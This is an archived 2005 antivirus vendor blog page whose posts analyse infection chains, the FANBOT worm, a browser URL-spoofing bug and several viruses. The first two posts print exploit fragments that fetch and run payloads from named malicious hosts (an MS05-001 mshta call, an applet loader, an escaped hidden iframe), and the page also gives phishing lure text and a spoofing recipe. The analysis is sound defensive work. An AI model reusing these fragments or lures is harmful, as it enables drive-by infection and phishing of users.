検索:
ホーム   »   Archives for 10月 2005

Mixed Threat Part 2: They Come Through Emails!

  • 投稿日:2005年10月27日
  • 執筆:ウイルス解析担当者
0



The thing about this is that one malware creates a link of event which ultimately leads a system to be infected with a number of other malwares. From one malware the execution goes to another one until the flow is finished, which by this time the system is already infected with anything that comes up to the malware authors mind. It can be a trojan, a spyware even worms.

Here is a new example of this. The flow begins with an email which eventually leads to the system being infected by trojans…

Below is an email that was spammed just this October 22, 2005.



As you can see a link was provided by the email, fooling the user that it is a copy of the transaction invoice.

When this link is clicked it starts a chain of event which we now call the “Bouncing Malware” (ala SANS). =)
When loaded the site in the picture informs the user that an “INTERNAL SERVER ERROR” occurred. Below is a picture of the website.



No alarm there right?…Wrong!=) Looking at the source code of this site, it shows that it contains an iframe exploit, which loads these two

“http://nlpshoping.com/huindex.html”
“http://nlpshoping.com/estat.php”

The file estat.php turned out to be a “zero byte file”, but huindex.html is “very bad”.

From this html it loads the file http://nlpshoping.com/loader.exe using java applet.

Here is a code snippet from huindex.html

<APPLET CODE=”GetAccess.class” WIDTH=”1″ HEIGHT=”1″>
<PARAM NAME=”cabbase” VALUE= “{blocked}.jr”>
<param NAME=”ModulePath” value=”http://nlpshop{block}ader.exe”></applet>
</APPLET>

It then uses another exploit which allows http://nlpshoping.com/ppp.hta to be downloaded and run using vulnerability in HTML HELP (MS05-001)

<OBJECT id=x3 classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11

style=”position:absolute;left:-1000″>

<PAR{BLOCKED}ommand” VALUE=”Related Topics”>

<PAR{BLOCKED}utton” VALUE=”Text:”>

<PAR{BLOCKED}indow” VALUE=”$global_blank”>

<PAR{BLOCKED}tem1″ VALUE=”command;javascript:document.links



[0].href=’EXEC=,mshta,http://nlpshoping.com/ppp.hta

CHM=ieshared.chm FILE=app_install.htm’%3Bdocument.links[0].click();”></OBJECT>


The file ppp.hta is a TROJAN DROPPER. It contains a vbscript which drops the file upgrade.exe in “c:windows”.

The files Upgrade.exe and loader.exe are just the same.

They download these exe files exe files





  • http://nlpshoping.com/notepad.exe

  • http://site.com/toolbar.exe1

  • http://site.com/proxy.exe1

  • http://site.com/4.exe1

  • http://site.com/5.exe1


I tried getting the files from site.com but it was already down. But notepad.exe is still uploaded.

The file notepad.exe is also a TROJAN DROPPER. Among the files that it drops in the systems directory are



  • winsetup.exe

  • svchost.dll
All files have already been submitted to the service team and are waiting for their detection name.
So let’s review what we’ve got so far.



  • an email that fools users into clicking a link.(http://nlpshoping.com/billing/order203401.html)


  • a site (http://nlpshoping.com/billing/order203401.html) using IFRAME exploit loads another site (http://nlpshoping.com/huindex.html)


  • huindex.html using an exploit in handling java applets loads a file named “LOADER.EXE”


  • It also exploited a vulnerability in HTML HELP (MS05-001) to load the site http://nlpshoping.com/ppp.hta


  • ppp.hta contains a vbs script which drops “UPGRADE.EXE”


  • dont forget “UPGRADE.EXE” and “LOADER.EXE” are just the same file.


  • These two files are just downloaders which downloads this file, http://nlpshoping.com/notepad.exe, among others but the other sites are already down.


  • The file notepad.exe is a TROJAN DROPPER which installs another trojan in the system(winsetup.exe and svchost.dll).


  • The files winsetup.exe and svchost.dll monitor internet explorer and steals user information.

whew! so this is why its called a “MIXED THREAT”.

But lets not forget, all these chain of events started with a single email. One that was made perfectly to make users believe that it was authentic. Actually the real reason for these “chain of events” to happen is when the user was fooled into clicking that link. Yes, he was social engineered, and so was used by the malware author for the execution of his trojan.

So as a fair warning, let’s be vigilant. Always check where your emails come from, and even then check the attachments if there are any. Plus of course it always helps to have a completely patched system.

続きを読む

A Mixed Threat Adventure

  • 投稿日:2005年10月27日
  • 執筆:ウイルス解析担当者
0

Mixed threats are becoming more and more common nowadays. Most of the times, users don’t even know what hit them until it’s too late. Just visit a site, which REALLY looks like a legitimate one by the way, and presto – you have your instant adwares, spywares, backdoors, trojans or even worms roaming free and undetected in your system!

We have reported many of these examples of what we may call as Mixed Threat Adventures or mal-Adventures in the past, but here’s one current example that is still out there in the wild, so to speak!

This site, http: //www.freedailyjigsawpuzzles.com/, REALLY just looks like a normal website offering free jigsaw puzzles.




But by looking at the code of this would be “Normal Website”, I saw this – a javascript which is encoded using the escape command.

document.write(unescape(‘%3C%69%66%72%61%6D%65%20%73%72%63%3D
%22%68%74%74%70%3A%2F%2F%77%77%77%2E%70%66%6C%2D%65%6E%6C
%61%72%67%65%2E%63%6F%6D%22%20%77%69%64%74%68%3D%30%20%62
%6F%72%64%65%72%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F
%69%66%72%61%6D%65%3E’));


which when unescaped exploits an iframe to load another website
http://www.pfl-enlarge.com.

This website in turn loads another site, http://www.britroadsters.com, using again the iframe exploit.

The http://www.britroadsters.com site checks for the browser application. If the browser is “Microsoft Internet Explorer” then it loads the file enter.php and if it’s not it loads the file all.php. It doesn’tt really matter however since both these files actually just load another website using again an iframe exploit which will lead to
http://www.secretadvise.biz/news.html.

Hehe… In the words of my TL, this is just like following the bouncing ball of malware.

So in the site http://www.secretadvise.biz/news.html, which is reeeally an “evil” site, there is a javascript (encoded with again the escape command) which exploits the Microsoft HTML Help Vulnerability (MS04-013) and ultimately downloads and executes a file named
“Style.css”.

Here is an image of the decoded script from news.html.



Voila! The exploit code can now be seen… and a mysterous style.css file…

From website links, now we go to files downloaded

Don’t be fooled by the extension – Style.css is actually a chm file which drops an exe file named open.exe. There you now we’re getting somewhere!:) hehe.. But that’s not where it ends…

The file open.exe is also just a downloader and downloads a file from
http://www.secretadvise.biz/girl.bmp. And this “bmp” file is – hold your horses – a backdoor!

The files have been sent to the service team for signature generation and here’ss the reply. The files will be detected as such:

News.html (1,998 bytes) – JS_WONKA.B
Style.css (13,016 bytes) – CHM_DROPPER.CN
Open.exe (2,608 bytes) – TROJ_DLOADER.AJH
Girl.bmp (50,920 bytes) – BKDR_HAXDOOR.CT

So let us review, just by visiting a site, a seemingly normal and non-malicious site, the system will be infected with 4 malwares. Plus there’s the added bonus of having a malicious user hack in to your system because of BKDR_HAXDOOR.CT!

So for those Net-Surfers out there, just keep in mind what sites you go into. Plus of course it’s always a good thing to have your systems patched and your pattern files updated.:)

続きを読む

Stalking the Fanbot

  • 投稿日:2005年10月27日
  • 執筆:ウイルス解析担当者
0

Brief History

During the first quarter of 2005, the advent of the family of mass-mailing bot-worms called MYTOBs gave rise to the vast proliferation of so-called BOT creators or groups that thrive on and make use of the modularity, functionality and “effectiveness” of the open-source codes. I will refer to the MYTOB open source as “Hellbot” since this underground entity has been tagged as one of the most prolific in the MYTOB scene.

Barely 7 months after, one Moroccan worm writer from the MYTOB scene that goes by the handle of Diabl0, along with a Turkish partner code-named Coder, eventually rose up from the ranks and released the ZOTOB variants and they came with a blast! Incorporating a modified MYTOB code tagged as HellBot3 and an exploit code that targets the MS05-039 Vulnerability barely 3 days after the patch release, the blast eventually became an Outbreak! Even though the first two variants did not have the code for mass-mailing, it is quite evident that the MYTOB or MYDOOM code was there, and it wouldn”t be long before a mass-mailing ZOTOB appeared and it did!

Other “upgraded” BOTs (IRCBOTs, SDBOTs, BOZORIs) with the same exploit soon multiplied with the intent of outdoing each other in the BOTNET arena setting war to grab hold of each other”s zombie-network for their own malicious ends. The war soon petered out, and the original ZOTOB worms died down eventually when Diabl0 and Coder eventually got arrested barely two weeks after. Copycat ZOTOBs still appeared though, but it should be of course obvious that some other script-kiddie groups were and are still the ones responsible, what with the HellBot, HellBot3, source codes out in the open for them to cut-and-paste, modify, compile, re-compile, pack and/or compress using new and out-of-the-way unconventional file-packers and compressors or encryptors

Come September, a HellBot-group splinter script-kiddie known in the Chinese cyber-underground community as x140yu, along with the help of another kiddie known as x140d4n, has been developing a modified version of the MYTOB modules. By the first week of October, the project was then released in the wild. Its name FANBOT!

FANBOT vs MYTOB

For those asking what the differences FANBOT has over MYTOB and if it does have the same robust spreading potential, shown below are some information that may somehow shed some light …

Yes .. this IS exactly what it is… a MYTOB plus a PNP (MS05-039) exploit code PLUS some other factors which make it different (at one point or another):

1) Incorporation of a fake message box upon execution of the worm such as this:




2) Propagation via P2P (Peer-to-Peer) or file-sharing networks such as Kazaa, eDonkey and Morpheus using filenames targeting a diverse audience also including would-be virus analysts and writers alike using names such as:



  • Bifrost.scr
  • How to hack new.doc.exe
  • how to hack.doc.exe
  • netsky source code.scr
  • Smashing the stack full.rtf.exe
  • virii.scr
  • Visual Studio Net Crack all.exe
  • Win Longhorn re.exe
  • Win Longhorn.doc.exe
  • Windows 2000 Sourcecode.doc.exe
  • Windows 2003 crack.exe
  • Windows XP crack.exe

3) This FANBOT family is not the brainchild of any of the conventional MYTOB groups, nor of course of the ZOTOB creator (since he is behind bars already) – but the creation of an altogether different individual (presumably) that goes by the handle of x140yu with an email address of x140yu@Gmail.Com. He even specifically “points out” in some of his creations that he created this new line out of MYDOOM+SDBOT and explicitly lets out that the MYTOB “author is an idiot!!!” (see text found in the worm code below) and kills processes related to MYTOB such as hellmsn.scr and msnmsgs.exe, those related to BOZORI such as botzor.exe, and other bots such as coolbot.exe.


[Phantom] 2005 Made By Evil[xiaou]. Greetz to good friend x140d4n. Based On sdbot&&mydoom.
HellBot3 have BackDoor in ‘HellMsn.h’. The HellBot3 author is an idiot!!!
MSG to Kaspersky&Norton: can u make it difficulty next time!!! stupid. dont call me Fanbot,i am [Phantom]!!! SHIT!!!
Play with The best, Die like the rest.

4) One particularly unique thing about this worm family is that it is the first to also target the Trend Micro System Cleaner by killing off any running processes of TSC.EXE.

5) Also unique among the mass-mailing bot domain, some later members of the FANBOT family now banks on the popularity of Skype as can be seen by most of the attachments the family sends out (example: Share Skype, Skype, Skype for Windows 1.4, Skype-details, Skype-document or Skype-stuffs). Email characteristics of this type include:

Subject:(Any of the following)


  • Share Skype

  • Share Skype.

  • Skype

  • Skype for Windows 1.4

  • Skype for Windows 1.4 – Have you got the new Skype?

  • Skype-details

  • Skype-document

  • Skype-info

  • Skype-stuffs

  • What is Skype?

Message Body


Dear user {name of recipient},

Skype is a little piece of software that lets you talk
over the Internet to anyone, anywhere for free.
download the latest version of Skype:
And it just got even better Our call quality is the best ever for talking, laughing and sharing stories.
You can forward calls on to mobiles, landlines
and other Skype Names. Make calls instantly from Outlook email or
Internet Explorer with our new toolbars. play around with sounds, ringtones and pictures to show the world who you are.
Personalise your Skype For further details see the attached document.

(c) 2002-2005 by Skype Technologies S.A.
Legal information

This message contains graphics. If you do not see the graphics,
click here to view.

Attachment:(any of the following file names)


  • readme

  • Share Skype

  • Skype

  • Skype for Windows 1.4

  • Skype-details

  • Skype-document

  • Skype-info

  • Skype-stuffs


(with any of the following first extension names)


  • BAT

  • CMD

  • EXE

  • PIF

  • SCR

  • ZIP

6) FANBOT continually updates its creations by having his newer versions KILL OFF his older ones found in any target systems (like deleting phantom.exe, xiaoyu.exe, etc.)

7) Via port 5262, the IRC server jojogirl.3322.org is also being connected to by the worm family.

8) Interestingly, the worm family also attempts to connect to 28.76.115.50 which is connected to the DoD!

Introducing the worm author

Looking at the text found in the worm body shown below, it can be seen this x140yu also has a “friend” that goes by the nickname of x140d4n – from whom I gather x140yu got some of his code modules or techniques. (The entity x140d4n has got a site LOADED with backdoors and Trojans and I am digging deeper in this site as I speak!)… x140yu probably got some backdoor techniques and code modules from this x140d4n.


Play with the best, Die like the rest.
[Phantom] 2005 made by Evil[xiaou]. Special Thanks:x140d4n.
If u have Zotob’s SourceCode, please u mail it to me!!!
E-mail:x140yu@Gmail.Com thanks!!!

And yes, as I”ve mentioned earlier, the author was still struggling just last September on perfecting his creations(s), and maybe x140d4n came to his “rescue”, ergo the Special Thanks. Seen below is one example of evidence traced regarding x140yu’s early days of bot-coding struggle … x140yu WAS asking for source codes! Tsk tsk …




You can also catch him (x140yu) here:

QQ: 75…71
ICQ: 30…78
MSN: x…@…com
E-mail: x…@…com
Gmail: x…@…com

*** Email us if you need the exact contact emails and we’ll send them over _IF_ the reason _IS_ for valid and legitimate purposes _ONLY_.

x140yu also has a blogsite, as shown below. The author really has something for alphanumeric text strings!




Further cursory glance at the site reveals some more interesting things.




Hmmm .. Aha!… A BotNet?!?! The link is empty though, and milworm! Ahhh yes … this is the site (milworm) where some of the more famous exploit codes that caused outbreaks in the past have been posted. Exploit codes such as used by SASSER and ZOTOB are posted here. And from one of the strings found in FANBOT”s code found above, this is one proof the author really wants to grab any code related to ZOTOB!

What”s more, we”ve also got a snapshot of x140yu taken from the worm author”s blogsite titled “x140yu”s Photo”.


Apparently, x140yu alone or both x140yu and x140d4n are members of or in cahoots with the Brazilian-Persian “Evil Security Team” hacker group in spreading this worm, as can be seen in the mutex it creates:



___—>>[E-v-i-l_S-e-c-u-r-i-t-y_T-e-a-m]<<<—___


Their site is located at 210.1183 and is located at Korea. It is maintained by someone called “M3hDy EviL b0y”.




What Next?

All in all, my take on this is that this is just one of those more-than-average kiddies who’s gotten the opportunity to an open HellBot, some MYDOOM and some MS05-039 exploit source codes, added his own modifications and who’s got probably some word-war with some of the MYTOB groups in the underground – and voila – a new worm!

Moreover, this is just another example of the growing intent of bot creators of infiltrating and amassing more and more zombie networks either by affecting new targets or by competing against other worm-bot authors and take hold of the zombie networks for their own purposes.

Same old same old… but like all kiddie-works, this may have some high moments (like now and probably in the next two months or so) until it just peters out eventually, or when the kiddie(s) move on to a next “pet-project” or when authorities do get a hold of them… or him… or her!… ;-p

If we should do something to stop or prevent even a starting rampage of a new worm author”s creations, we should stop it, him or her or them before they increase in the near future. The information above is a starting point, and we can… and should stop it now …


続きを読む

New Skype Vulnerabilities

  • 投稿日:2005年10月27日
  • 執筆:ウイルス解析担当者
0

New Vulnerabilities in Skype, a little
program for making free calls over the internet, announced two
vulnerabilities in its code.


Read more about it here and here.


So for Skype users out there, an updated version which addresses
the vulnerabilities mentioned above is already uploaded in this site.

続きを読む

(Yet Another) URL Spoofing Bug

  • 投稿日:2005年10月21日
  • 執筆:ウイルス解析担当者
0

Another URL spoofing in at least two browsers has been discovered. It was first reported as a URLspoofing vulnerability in Internet Explorer. Subsequent discussions later revealed that Firefox is also vulnerable.

To create such a bug, start off with a simple link tag: <a href=""> </a>

Then within that tag, include an onClick() event. This event is triggered when the link is clicked. Then use the onClick event to include a Javascript that redirects the browser into a web page of your choice.

As you may have noticed, the redirection is done through Javascript. The redirection script can be modified such that an attacker can employ this to execute custom Javascript of the attacker's choosing. For example, it could be leveraged to perform a cross-site scripting attack.

And since this is a spoofing bug, it could be used for phishing or luring unsuspecting users into clicking malicious URLs.

Workaround

Disabling Javascript support in your browsers is an effective workaround for this spoofing bug.

Demo

Click on any URLS below for demonstration. See the underlying source code to see how the URL spoofing works. And yes, all links are safe.


Redirect to trendmicro.com, even though the URL says "http://google.com"

Google

Pop a message box

Google


Tested on:


  • IE 6, Windows XP SP2
  • Firefox v1.0.7, Windows XP SP2

続きを読む

Snort Buffer Overflow

  • 投稿日:2005年10月20日
  • 執筆:ウイルス解析担当者
0

First, a little light:
[Start Quote]
“Snort is an open source network intrusion prevention and detection system utilizing a rule-driven language, which combines the benefits of signature, protocol and anomaly based inspection methods. With millions of downloads to date, Snort is the most widely deployed intrusion detection and prevention technology worldwide and has become the de facto standard for the industry.”
[End Quote] www.snort.org

Two days ago, ISS released an advisory on a buffer overflow on Snort which may be used by worms. I admit I wasn’t paying too much attention to this when the advisory was released because… well.. because nothing hehehehe. Eeeeeniwey, what caught my attention was ISC’s Infocon Yellow, and after reading their reasoning on why this ‘is a big deal’, i thought “Oh yeeah, it IS a big deal”. Think witty.

Excerpts from ISC:
[Start Quote]
Why do we think this is a big deal:


  • The exploit is rather easy to write. Yes, its specific to a particular binary, but there are a number of common binaries deployed in large numbers.
  • It uses a single UDP packet, which can lead to very fast spreading worms.
  • The UDP packet can be spoofed, and can use any port combination.
  • Snort is very popular. A fast spreading (noisy) UDP worm could lead to local slowdowns/outages.
[End Quote]

So anyway, paul and I were trying to create a POC for this (since we couldn’t find one), when suddenly!(for added drama hehehe), a new post from Full-Disclosure came in which carried a POC(albeit unfinished: only crashes target machine) for the Snort exploit (by H.D Moore of Metasploit). Oh well. At least creating a complete POC(with shellcode) will be much easier since H.D. Moore already started it hehehehe and NVW only needs the code that causes the exploit. Also, the NVW team has already been alerted on this issue as well as the POC.

続きを読む

Virus Advisory: PE_NOFACE.B

  • 投稿日:2005年10月18日
  • 執筆:ウイルス解析担当者
0

We have receieved reports of an overwriting
virus infecting some computers in China. This infector locates for
files in the system and overwrites them with all 69KB of its code.
After the virus is done with the file, the latter is rendered
useless and irrecoverable.


Since the virus is only 69KB in size, file which have more than
that number of bytes retain their sizes, but their extra bytes will
no longer function. And, as for the files that have less than 69KB
in size, they become purely 69KB of virus code.


This virus is now detected as PE_NOFACE.B.

続きを読む

SYMBOS_COMWAR.C

  • 投稿日:2005年10月18日
  • 執筆:ウイルス解析担当者
0

We have received a sample of a Symbian
malware that exhibits the same behaviour as of the SYMBOS_COMWAR
family.


The first generation of the malware arrives as one of the files
inside a pirated copy of SymCommander software. SymCommander is a
file management software specifically used for Symbian
phones.


The actual malicious file inside the pirated copy of SymCommander
SIS package is named cwoutcast.exe. Just like the other
SYMBOS_COMWAR variants A and B, it also propagates through MMS by
sending a copy of itself as a .SIS installer. It also propagates
through Bluetooth by sending itself in a randomly generated
filename.


It is also noticeable the embedded string on the cwoutcast.exe as
qouted below.

“CommWarrior Outcast: The dark side of Symbian
Force.

CommWarrior v2.0-PRO. Copyright (c) 2005 by e10d0r

CommWarrior is freeware product. You may freely distribute it

in it’s original unmodified form.

With best regards from Russia.


OTMOP03KAM HET!”



Update
The sample has been given the detection name
SYMBOS_COMWAR.C.

続きを読む

Walk the talk

  • 投稿日:2005年10月18日
  • 執筆:ウイルス解析担当者
0

Cellphones may perhaps top the list of items
which are most likely stolen. It may even be more desirable now
than wallet, jewelry and watches. It is easy money for thieves
because there’s no scarcity in prospective buyers.


One of the latest technologies devised to *hopefully* lessen, if
not completely eradicate cellphone theft is a “Walking style-based
recognition” system, which incorporates the mobile device to the
way the owner walks. Yep, you heard it right, the way the owner
walks
. Its main principle is based on gait, which refers
to the different aspects of a user’s movement. The system has
various sensors in order to measure the user’s gait. Of course,
upon purchase, measurements of the user’s “gaitcode” would be taken
and stored in memory, which would be checked periodically. This
checking is performed automatically and doesn’t require any input
from the owner. If the gaitcode doesn’t match, the device would
shut down, and would require proper authentication in order to
reactivate again.


This method certainly sounds promising because it could also be
applied to other electronic gadgets which caters our various
personal needs such as laptops, PDA’s, ipods, etc.


This would mean that these personal gadgets would certainly have to
be personal. Borrowing or lending them are big no-no’s
because only the authentic owner whose gaitcode matches the one in
the device would be able to use it. Come to think of it, even the
registered owner may find instances where the device won’t work for
them. Depending on how the sensors are placed, or how they measure
the movement, certain situations would lead to changes in movement.
These include being impaired in movemet when you’re injured and
must move limply or, difference in the way you walk due to
uncomfortable shoes, or difference in the pavement you walk on.
There are still lost of questions and what-if’s with regards to the
utilization of gaitcode for security enforcement. Let’s just wait
and see if it would actually be implemented…


Click this for the news.

続きを読む

Microsoft Windows Vista Meets The First Nemesis

  • 投稿日:2005年10月18日
  • 執筆:ウイルス解析担当者
0

If you have been reading news, you may have
heard of the much-awaited, much-delayed operating system succeeding
the Windows XP. The beta version of the software, Microsoft Windows
known by its code name, Longhorn previously and now Windows Vista,
is now available. And that is one big news, so is the first virus
infecting it.


On the face of it, it is not actually a major threat – and can be
in line with some of the other proof-of-concept malwares or
viruses, but this can also be seen as an effort of virus-writer
groups to target new (Microsoft) platforms at the earliest time
possible (in this case, Microsoft .NET Framework 2.0 which is
included in Windows Vista beta 1)- even if the target platform is
still in beta! Whew!


And as we know… MS Vista will indeed be big…


Let’s hold on to our horses… the MS Vista malware scene will sure
be interesting in the near future!


The malware sample is now being processed by the Service Team so
hang on for updates.


Update
The file is now given the name PE_DONUT.B.
Based on initial analysis this malware runs on Microsoft Vista
under Microsoft DOT Net Framework 2.0 and tries to overwrite EXE
files in current directory.

続きを読む
Page 1 of 3123


  • 個人のお客さま向けオンラインショップ
  • |
  • 法人のお客さま向け直営ストア
  • |
  • 販売パートナー検索
  • Asia Pacific Region (APAC): Australia / New Zealand, 中国, 日本, 대한민국, 台灣
  • Latin America Region (LAR): Brasil, México
  • North America Region (NABU): United States, Canada
  • Europe, Middle East, & Africa Region (EMEA): France, Deutschland / Österreich / Schweiz, Italia, Россия, España, United Kingdom / Ireland
  • 電子公告
  • ご利用条件
  • プライバシーポリシー
  • Copyright © 2021 Trend Micro Incorporated. All rights reserved.